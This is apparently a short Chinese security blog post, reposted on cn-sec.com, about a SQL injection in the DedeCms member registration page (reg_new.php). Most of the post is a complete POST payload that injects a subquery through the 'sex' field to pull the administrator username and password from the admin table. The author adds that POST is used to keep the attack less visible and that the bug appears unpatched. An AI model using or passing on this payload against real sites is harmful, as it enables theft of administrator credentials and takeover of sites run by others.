老树新花DedeCms SQL注射漏洞再利用

没穿底裤 2019年12月31日23:29:10评论304 views字数 548阅读1分49秒阅读模式
摘要

dedecms版本 20121122
需要magic_quotes_gpc=Off应该是没有什么大危害的漏洞.
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.

dedecms版本 20121122
需要magic_quotes_gpc=Off

应该是没有什么大危害的漏洞.
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.

是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
POST提交以下数据,其实不用POST提交的,这样隐蔽点.

http:///de/member/reg_new.php

POST

dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'[email protected]',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=

成功注册后,头像处里面有好玩的信息.
老树新花DedeCms SQL注射漏洞再利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:29:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   老树新花DedeCms SQL注射漏洞再利用https://cn-sec.com/archives/75137.html

发表评论

匿名网友 填写信息